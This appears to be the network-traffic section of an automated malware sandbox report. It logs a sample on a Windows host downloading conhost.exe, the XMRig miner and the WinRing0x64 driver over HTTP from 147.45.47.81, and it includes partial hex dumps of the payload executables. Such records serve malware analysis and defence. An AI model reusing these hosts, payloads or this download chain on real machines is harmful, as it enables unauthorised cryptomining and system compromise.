                                                                                                                                                                                0192.168.2.949833147.45.47.81807908C:\Users\user\Desktop\PqSIlYOaIF.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 10, 2024 09:18:22.477693081 CET198OUTGET /conhost.exe HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                Host: 147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.305877924 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                Date: Sun, 10 Nov 2024 08:18:23 GMT
                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                Content-Length: 3125704
                                                                                                                                                                                Last-Modified: Tue, 20 Aug 2024 12:02:17 GMT
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                ETag: "66c485c9-2fb1c8"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 58 05 30 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 d4 4e 00 00 00 00 00 00 00 00 00 00 c0 75 2f 00 08 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                Data Ascii: MZ`@`!L!Require Windows$PEL?O_@X00Nu/<l.text `.rdata;<@@.dataM@.rsrcN0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
                                                                                                                                                                                Nov 10, 2024 09:18:23.305892944 CET212INData Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1
                                                                                                                                                                                Data Ascii: jZQ39FY~9F~fAfG@;F|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A|At>E;Ew6rE;Es,j*P*YYtlAj@ AEPjh5
                                                                                                                                                                                Nov 10, 2024 09:18:23.305900097 CET1236INData Raw: 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c9 c2 0c 00 8b 44 24 08 85 c0 74 0c a3 6c e9 41 00 b8 05 40 00 80 eb 3a 56 8b 74 24 08 57 8d 7e 24 83 3f 00 74 0f 8b 4e 20 8d 46 34 50 83 c1 08 e8 c0 11 01 00 8b cf e8 da 29 01 00 83 7e 1c 00 74 0c ff 76 40 ff
                                                                                                                                                                                Data Ascii: XAA3D$tlA@:Vt$W~$?tN F4P)~tv@v(A_3^UVuA}juuv(j}iuv(jjuVP^]=AtjA=XAtL$AVQ3=lAQjjPR=Atj5XA
                                                                                                                                                                                Nov 10, 2024 09:18:23.305912018 CET1236INData Raw: 50 ff 51 08 ff 76 10 e8 ef 7a 01 00 8b 76 0c 85 f6 59 74 06 8b 06 56 ff 50 08 5e c3 83 6c 24 04 04 e9 76 ff ff ff 56 6a 01 8b f1 e8 d3 fc ff ff 8b 46 04 8b 0e 66 8b 54 24 08 66 89 14 41 ff 46 04 8b 46 04 8b 0e 66 83 24 41 00 8b c6 5e c2 04 00 55
                                                                                                                                                                                Data Ascii: PQvzvYtVP^l$vVjFfT$fAFFf$A^UuMuME]Vt$NFuhVrzY3^Uh$AuYYtEMPQ3hAu{YYu@]L$IAujP3VN
                                                                                                                                                                                Nov 10, 2024 09:18:23.305926085 CET1236INData Raw: c7 89 45 08 75 96 33 c0 66 39 7d dc 8d 55 d4 0f 95 c0 52 6a 0c ff 75 0c 89 46 3c 8b 46 0c 8b 08 50 ff 51 18 3b c7 89 45 0c 74 19 8d 4d d4 e8 fe 08 01 00 ff 75 f0 e8 ec 75 01 00 8b 7d 0c 59 e9 cf fe ff ff 0f b7 45 d4 3b c7 74 1a 83 f8 40 74 07 6a
                                                                                                                                                                                Data Ascii: Eu3f9}URjuF<FPQ;EtMuu}YE;t@tjfqEF4EF8EPAF4PEPA9~<t3Y>jh/N4QPYY%jlu;YtxXAH3PMF (F jQHxx
                                                                                                                                                                                Nov 10, 2024 09:18:23.305938959 CET1236INData Raw: 15 60 a1 41 00 85 c0 74 09 50 ff 15 64 a1 41 00 eb 7a 83 3d 90 e9 41 00 00 75 6f 8b 35 68 a1 41 00 68 d0 a5 41 00 bb c4 a5 41 00 53 c7 05 90 e9 41 00 01 00 00 00 ff d6 8b 3d 6c a1 41 00 50 ff d7 6a 00 89 45 fc 0f b7 05 80 e9 41 00 68 09 04 00 00
                                                                                                                                                                                Data Ascii: `AtPdAz=Auo5hAhAASA=lAPjEAhjPEhAPA}uhASPEtjEPjU3_^[U,SVW3WAjXPE0A}j`X5TAj`jdPv|=j[j=j[j_EPju
                                                                                                                                                                                Nov 10, 2024 09:18:23.305979013 CET848INData Raw: 50 0f b7 05 80 e9 41 00 68 04 10 00 00 50 ff 15 34 a1 41 00 85 c0 7e 13 8d 85 58 ff ff ff 50 ff 15 d4 a1 41 00 59 a3 84 e0 41 00 8d 47 01 50 ff b6 bc e0 41 00 57 53 6a 00 ff 35 84 e0 41 00 ff 15 38 a1 41 00 8b 86 bc e0 41 00 5f 5e 5b c9 c3 83 3d
                                                                                                                                                                                Data Ascii: PAhP4A~XPAYAGPAWSj5A8AA_^[=At VAtPl&Y~u^U$hAhAhAPlAtMQE38Au0A=At*h@AhAhAPlAt5A%A
                                                                                                                                                                                Nov 10, 2024 09:18:23.305990934 CET1236INData Raw: c0 74 0c 46 3b 77 08 7c e3 33 c0 5f 5e 5b c3 85 db 74 02 89 33 8b 47 0c 8b 04 b0 eb ee 56 8b 74 24 08 57 33 ff 39 7e 08 7e 28 8b 46 0c 8b 04 b8 ff 74 24 10 8b 00 50 ff 15 24 a1 41 00 85 c0 75 0b 8b 06 6a 01 57 8b ce ff 50 04 4f 47 3b 7e 08 7c d8
                                                                                                                                                                                Data Ascii: tF;w|3_^[t3GVt$W39~~(Ft$P$AujWPOG;~|_^Vvh6hYY^t$t$t$Yt@3U@}u3AE@uEEP At7M3;w.rE;Es$j+pPkYYtAA3@
                                                                                                                                                                                Nov 10, 2024 09:18:23.305999994 CET212INData Raw: 47 04 5b 8b c7 5f c3 55 8b ec 53 56 8b 75 08 8b ce e8 f4 fc ff ff 8b 45 0c 33 db 39 58 04 74 32 57 8b 78 04 8b 00 53 8d 0c 3f 89 45 08 53 8d 41 01 50 51 8b ce e8 4e fd ff ff 50 57 ff 75 08 53 ff 75 10 ff 15 18 a1 41 00 8b 0e 88 1c 08 89 46 04 5f
                                                                                                                                                                                Data Ascii: G[_USVuE39Xt2WxS?ESAPQNPWuSuAF_^[]UMv}jM2V5AW}juPuucY7S@PPMPSuVf$FYEEPdVcY[_^
                                                                                                                                                                                Nov 10, 2024 09:18:23.306009054 CET1236INData Raw: c3 55 8b ec b8 20 10 00 00 e8 cf 63 01 00 53 56 57 8b 7d 08 8b 07 33 db 53 53 53 53 57 ff 50 10 8b 45 14 ff 75 0c 8b 35 30 a1 41 00 89 58 04 8b 00 88 18 ff d6 ff 75 10 89 45 f4 ff d6 89 45 e8 33 f6 88 5d ff 89 5d ec 89 5d f0 eb 03 8b 7d 08 8b 07
                                                                                                                                                                                Data Ascii: U cSVW}3SSSSWPEu50AXuEE3]]]}MQ+Q5QWPE;3E8]t=+E;w`uuubE:EtuMvGE+E;w#uuubuEE
                                                                                                                                                                                Nov 10, 2024 09:18:23.311187983 CET1236INData Raw: 8b c6 5f 5e 5b c3 8b 4c 24 04 56 6a 5c e8 25 f7 ff ff 8b 4c 24 08 6a 2f 8b f0 e8 18 f7 ff ff 3b c6 7e 02 8b f0 8b c6 5e c3 56 57 8b 7c 24 0c 8b cf e8 fe e0 ff ff ff 74 24 10 ff 15 c8 a2 41 00 8b f0 85 f6 7e 21 8d 46 01 50 50 8b cf e8 97 f6 ff ff
                                                                                                                                                                                Data Ascii: _^[L$Vj\%L$j/;~^VW|$t$A~!FPPPt$Af$pw_^UtSVuWj@EPVAtIhAEPHAu6jV|Au)EVPvjhAutu]Y3_^[VA3;EthAhA


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                1192.168.2.94990778.47.21.153807868C:\Users\user\AppData\Local\Temp\main\Installer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 10, 2024 09:18:35.643449068 CET285OUTGET /4Ak49WQH0GE3Nr.mp3 HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                Host: joxi.net
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Nov 10, 2024 09:18:36.586478949 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                X-Powered-By: PHP/5.4.45
                                                                                                                                                                                Set-Cookie: js=vjY5gKPPXOMIQKvyKrW2EJJA%2CpvU4bx9DRj-nkSFZwu2oF6aAwimON-1ChrMTUv0LwGMMC5KnqpiGxrjHTwp30; path=/
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Date: Sun, 10 Nov 2024 08:18:36 GMT
                                                                                                                                                                                Vary: Accept-Language
                                                                                                                                                                                Vary: Accept-Language
                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                Data Raw: 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 cd 6e 13 31 10 be f7 29 cc 5e 36 41 9b 75 5a 5a 09 c8 6e a4 96 22 24 0e c0 a1 1c 50 55 21 77 d7 d9 75 bb 7f b5 9d a6 51 83 04 05 21 10 48 48 f4 c6 1b 70 4b 0b 85 40 9b 20 f1 04 de 57 e0 49 18 7b 93 14 a9 62 23 d9 b1 e7 9b cf 33 e3 f9 ec 5d 5b 7f 78 67 e3 c9 a3 bb 28 96 69 d2 5e f0 66 13 25 61 7b 01 c1 e7 a5 54 12 14 c4 84 0b 2a 7d ab 2b 3b 8d 9b d6 d4 24 99 4c 68 fb 7e 7e c0 d0 9f e7 c7 a8 7c a9 be aa 89 3a 51 63 35 2c 3f 20 f5 ab 7c 0e cb 2f 30 0e d5 05 fc 86 08 ec e7 60 29 5f a8 9f b0 3b 52 e3 f2 8d 9a 94 47 80 3a 45 6a 84 8c f3 85 3a d3 04 a8 7c 05 6e 3f d4 b9 71 06 db 2f 35 d1 8e 67 00 1f 79 b8 3a ba 8a 30 61 d9 2e 8a 39 ed f8 16 ee 90 7d 16 e4 99 0b 83 85 38 4d 7c 4b c4 39 97 41 57 22 bd 6f 21 d9 2f a8 6f b1 94 44 14 1f 34 cc de bf 34 95 8b ec 27 54 c4 94 4a 6b c6 8b 83 30 73 77 20 53 97 77 31 11 50 0b 81 03 21 f0 72 73 d9 85 19 38 aa 58 44 c0 59 21 2b c6 5a a7 9b 05 92 e5 59 8d 39 c2 c9 9d c8 e1 0e 71 d2 fa 21 db b4 ef e5 79 94 d0 d5 8c 24 7d [TRUNCATED]
                                                                                                                                                                                Data Ascii: 339uTn1)^6AuZZn"$PU!wuQ!HHpK@ WI{b#3][xg(i^f%a{T*}+;$Lh~~|:Qc5,? |/0`)_;RG:Ej:|n?q/5gy:0a.9}8M|K9AW"o!/oD44'TJk0sw Sw1P!rs8XDY!+ZY9q!y$}p{ym-_~h6{[uFxMi&Ecx==N$[n),&TkyjSXoI)7[-Q+uARerF;95~VX='cW5^F2)\@F*Afc6,-0N\D~:CR@k33'zxz&<RBX[=NYVJZpVdgb5ZQXZ+cuw_oNA`J$k N9oN5hj4R';;E}y:S.TDZ;LP4&V 18|wKY(0t;!5+{}D?a0\K2'
                                                                                                                                                                                Nov 10, 2024 09:18:36.586493969 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                2192.168.2.949933147.45.47.81807988C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 10, 2024 09:18:40.230947971 CET71OUTGET /xmrig.exe HTTP/1.1
                                                                                                                                                                                Host: 147.45.47.81
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Nov 10, 2024 09:18:41.070198059 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                Date: Sun, 10 Nov 2024 08:18:40 GMT
                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                Content-Length: 8251392
                                                                                                                                                                                Last-Modified: Fri, 17 May 2024 16:26:03 GMT
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                ETag: "6647851b-7de800"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 db 63 a2 64 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 10 5f 00 00 d8 7d 00 00 0c 32 00 d0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 b0 00 00 10 00 00 4c 7c 7e 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 ae 00 d8 46 00 00 00 40 af 00 e8 5c 00 00 00 10 76 00 9c ee 02 00 00 00 00 00 00 00 00 00 00 a0 af 00 6c 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 19 [TRUNCATED]
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdcd.&_}2@0L|~` F@\vl`t(@.text__``.data` _ _@.rdata0`&`@@.pdatavv@@.xdatayx@@.bss2|.idataFH|@.CRTh |@.tls0|@.rsrc\@\|@.reloclX}@B
                                                                                                                                                                                Nov 10, 2024 09:18:41.070215940 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                Nov 10, 2024 09:18:41.070226908 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                Nov 10, 2024 09:18:41.070238113 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                Nov 10, 2024 09:18:41.070255995 CET1236INData Raw: ba 02 00 00 00 31 c9 ff d0 e8 9f c1 41 00 48 8b 0d d8 36 74 00 ff 15 46 d5 ae 00 48 8b 15 1b 35 74 00 48 8d 0d 94 fd ff ff 48 89 02 e8 ac bc 42 00 e8 87 bf 41 00 48 8b 05 60 34 74 00 48 89 05 89 ad 7c 00 e8 84 b7 42 00 31 c9 48 8b 00 48 85 c0 75
                                                                                                                                                                                Data Ascii: 1AH6tFH5tHHBAH`4tH|B1HHuXtEt'H ~AA"ADfDt@PHt ~H|DEtD$\_Hc-#|DeMcIL0BL-|H~B
                                                                                                                                                                                Nov 10, 2024 09:18:41.070267916 CET1236INData Raw: 8d 48 02 83 f8 02 76 11 83 c0 05 84 d2 0f 45 c1 c3 0f 1f 84 00 00 00 00 00 84 d2 0f 44 c1 c3 66 2e 0f 1f 84 00 00 00 00 00 e9 7b 48 08 00 90 90 90 90 90 90 90 90 90 90 90 48 83 ec 48 48 8d 05 a5 18 60 00 45 31 c9 48 89 44 24 28 48 8d 44 24 38 49
                                                                                                                                                                                Data Ascii: HvEDf.{HHHH`E1HD$(HD$8IHD$ LD$8AHHATH0IHT$H1LD$PADL$XLL$HD$,nLL$PLAVLL$,LA>LL$XLA&
                                                                                                                                                                                Nov 10, 2024 09:18:41.070286036 CET1236INData Raw: 75 5e 48 89 c8 48 c1 e8 30 89 c2 84 c0 75 5a 48 89 c8 48 c1 e8 28 89 c2 84 c0 75 56 48 89 c8 48 c1 e8 20 89 c2 84 c0 75 52 48 89 c8 48 c1 e8 18 89 c2 84 c0 75 4e 48 89 c8 48 c1 e8 10 89 c2 84 c0 75 4a 0f b6 d5 84 ed 75 4c 89 ca 31 c9 0f b6 d2 31
                                                                                                                                                                                Data Ascii: u^HH0uZHH(uVHH uRHHuNHHuJuL11fufDAWAVAUATUWVSHhH=Yto!`HLzHMH9Hy HHD$HH|$@HyAI
                                                                                                                                                                                Nov 10, 2024 09:18:41.070297956 CET1236INData Raw: 86 41 89 c2 c1 e1 12 41 c1 e2 06 41 81 e2 c0 0f 00 00 44 09 d3 41 89 d2 41 83 e2 3f 44 09 d3 45 31 d2 09 cb 43 8b 0c 84 d3 eb 48 8b 4c 24 28 42 3b 1c 81 48 8b 4c 24 30 41 0f 92 c2 41 c0 e9 02 42 8b 0c 81 41 89 d8 c0 e8 04 41 83 e1 30 41 c1 e8 0b
                                                                                                                                                                                Data Ascii: AAADAA?DE1CHL$(B;HL$0AABAA0AAAEDDukHFHL@L;FvLH$CHVLBHFLFfPHL)H9LVIRH;VdJPHD$@IH[
                                                                                                                                                                                Nov 10, 2024 09:18:41.070310116 CET1236INData Raw: 83 f8 fc 0f 8d 14 01 00 00 44 89 f2 4d 63 c8 44 29 c2 41 83 f8 01 7f 08 4c 89 c9 45 84 db 74 18 49 8d 49 01 85 d2 7e 10 45 84 db 74 0b 83 ea 01 48 63 d2 49 8d 4c 11 02 41 b8 01 00 00 00 48 8d 51 02 45 29 d0 85 c0 41 0f 48 c0 83 f8 63 7e 11 48 83
                                                                                                                                                                                Data Ascii: DMcD)ALEtII~EtHcILAHQE)AHc~H=HOHHAH1tHHH)H9HCFIT$HFHHHI;T$vI$LHLHIrrDHEHT$@ALD$0H)Lt$0Ll$8'
                                                                                                                                                                                Nov 10, 2024 09:18:41.070327044 CET1236INData Raw: 84 24 f0 00 00 00 00 00 00 00 48 c7 84 24 28 01 00 00 00 00 00 00 48 c7 84 24 38 01 00 00 00 00 00 00 0f 11 84 24 70 03 00 00 ff 94 24 08 01 00 00 4c 8b ac 24 68 03 00 00 48 8b 9c 24 70 03 00 00 49 8d 4c 24 10 49 89 0c 24 4c 89 e8 48 01 d8 74 09
                                                                                                                                                                                Data Ascii: $H$(H$8$p$L$hH$pIL$I$LHtMH$H#HAEAD$I\$H$hH$`H9I|$H$AD$1I<$ID$HHuHcE1LHV2[I$0x
                                                                                                                                                                                Nov 10, 2024 09:18:41.076370001 CET1120INData Raw: 24 10 ba 09 00 00 00 48 8b b4 24 00 01 00 00 48 8b bc 24 08 01 00 00 48 89 44 24 48 49 89 04 24 31 c0 48 39 f2 48 89 c3 41 c6 44 24 10 00 49 c7 44 24 08 00 00 00 00 48 19 fb 0f 83 ff 05 00 00 ba 63 00 00 00 48 89 c3 48 39 f2 48 19 fb 0f 83 e3 05
                                                                                                                                                                                Data Ascii: $H$H$HD$HI$1H9HAD$ID$HcHH9HHH9H'H9HH|$8HHLL$Ht$0AE1H$MID?BH9LHH9LHH9LH H


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                3192.168.2.949934147.45.47.81807988C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 10, 2024 09:18:40.231121063 CET77OUTGET /WinRing0x64.sys HTTP/1.1
                                                                                                                                                                                Host: 147.45.47.81
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Nov 10, 2024 09:18:41.070343018 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                Date: Sun, 10 Nov 2024 08:18:40 GMT
                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                Content-Length: 14544
                                                                                                                                                                                Last-Modified: Fri, 17 May 2024 16:26:03 GMT
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                ETag: "6647851b-38d0"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 35 3a 6e fc 71 5b 00 af 71 5b 00 af 71 5b 00 af 71 5b 01 af 7d 5b 00 af 56 9d 7b af 74 5b 00 af 56 9d 7d af 70 5b 00 af 56 9d 6d af 72 5b 00 af 56 9d 71 af 70 5b 00 af 56 9d 7c af 70 5b 00 af 56 9d 78 af 70 5b 00 af 52 69 63 68 71 5b 00 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 c1 26 8b 48 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 0c 00 00 00 0a 00 00 00 00 00 00 08 50 00 00 00 10 00 00 00 00 01 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 06 00 00 00 00 00 00 00 00 70 00 00 00 04 00 00 08 19 01 00 01 00 00 00 00 00 04 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$5:nq[q[q[q[}[V{t[V}p[Vmr[Vqp[V|p[Vxp[Richq[PEd&H"PpdP<`@`p p.text h.rdata| @H.data0@.pdata`@@HINIT"P .rsrc`@B
                                                                                                                                                                                Nov 10, 2024 09:18:41.070355892 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 8b c4 53 48 83 ec 60 48 83 60 18 00 48 8b d9 48 8d 15 41 06
                                                                                                                                                                                Data Ascii: HSH`H`HHAHHL$LD$@L\$0A@3HD$(D$ y c% HdHHCpHHHHL$PHCh}HT$@HL$PyH$
                                                                                                                                                                                Nov 10, 2024 09:18:41.070369959 CET1236INData Raw: 48 8b 51 04 48 c1 ea 20 8b 09 8b 40 04 0f 30 48 8b 44 24 28 83 20 00 33 c0 eb 0d 48 8b 44 24 28 83 20 00 b8 01 00 00 c0 c3 cc cc cc cc cc cc cc cc 8b 09 0f 33 48 c1 e2 20 48 0b c2 49 89 00 48 8b 44 24 28 c7 00 08 00 00 00 33 c0 eb 0d 48 8b 44 24
                                                                                                                                                                                Data Ascii: HQH @0HD$( 3HD$( 3H HIHD$(3HD$( HHXHhHpHx ATH AIHAA;HH|wHDH=hE3HOE2t*ttA&OHHOH
                                                                                                                                                                                Nov 10, 2024 09:18:41.070383072 CET1236INData Raw: 70 01 08 02 00 08 b2 04 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii: p0
                                                                                                                                                                                Nov 10, 2024 09:18:41.070419073 CET1236INData Raw: 49 0f 44 c1 48 89 05 ae e0 ff ff 48 f7 d0 48 89 05 ac e0 ff ff e9 a7 bf ff ff cc cc cc b8 50 00 00 00 00 00 00 00 00 00 00 c4 51 00 00 18 20 00 00 a0 50 00 00 00 00 00 00 00 00 00 00 02 52 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii: IDHHHPQ PR QQPQhQQ>QQQ&QQQRkIofCompleteRequestIoCreateSymbolicLi
                                                                                                                                                                                Nov 10, 2024 09:18:41.070435047 CET1236INData Raw: 00 64 00 69 00 66 00 69 00 65 00 64 00 20 00 42 00 53 00 44 00 20 00 6c 00 69 00 63 00 65 00 6e 00 73 00 65 00 00 00 00 00 3e 00 0f 00 01 00 43 00 6f 00 6d 00 70 00 61 00 6e 00 79 00 4e 00 61 00 6d 00 65 00 00 00 00 00 4f 00 70 00 65 00 6e 00 4c
                                                                                                                                                                                Data Ascii: dified BSD license>CompanyNameOpenLibSys.org:FileDescriptionWinRing00FileVersion1.2.0.5:InternalName
                                                                                                                                                                                Nov 10, 2024 09:18:41.070449114 CET1236INData Raw: b0 53 c9 7a 98 01 15 88 c7 87 bd 81 90 2d ad 54 4b 4c 0c da 4d cf 87 a1 d1 55 ce c9 7b e3 ac ca 49 2f bb 22 22 21 0d 6e ce 84 21 dd 6b 0a 3f 7f a0 29 52 c4 41 02 9d 8f bd 23 92 a3 5b ab 14 fd fb 5c 7a 6b 9c c7 1a e6 e4 d6 c9 fc ec e7 1d 91 6e a6
                                                                                                                                                                                Data Ascii: Sz-TKLMU{I/""!n!k?)RA#[\zkn+c7{oa7~i/4>mz3kS'M_WcQ-EHR-mr1+9:z'BIdG]00`HB0
                                                                                                                                                                                Nov 10, 2024 09:18:41.070461988 CET1236INData Raw: 03 55 1d 0e 04 16 04 14 56 84 ec b5 71 a5 e7 63 d8 db 51 04 d6 fa e6 f0 48 52 49 ce 30 33 06 03 55 1d 1f 04 2c 30 2a 30 28 a0 26 a0 24 86 22 68 74 74 70 3a 2f 2f 63 72 6c 2e 67 6c 6f 62 61 6c 73 69 67 6e 2e 6e 65 74 2f 52 6f 6f 74 2e 63 72 6c 30
                                                                                                                                                                                Data Ascii: UVqcQHRI03U,0*0(&$"http://crl.globalsign.net/Root.crl0U#0`{fEP/}4K0*H\/.gJ&?5<VD7R0eNgL"xtt8v/8:a!bd#9w8~H_X&f"t
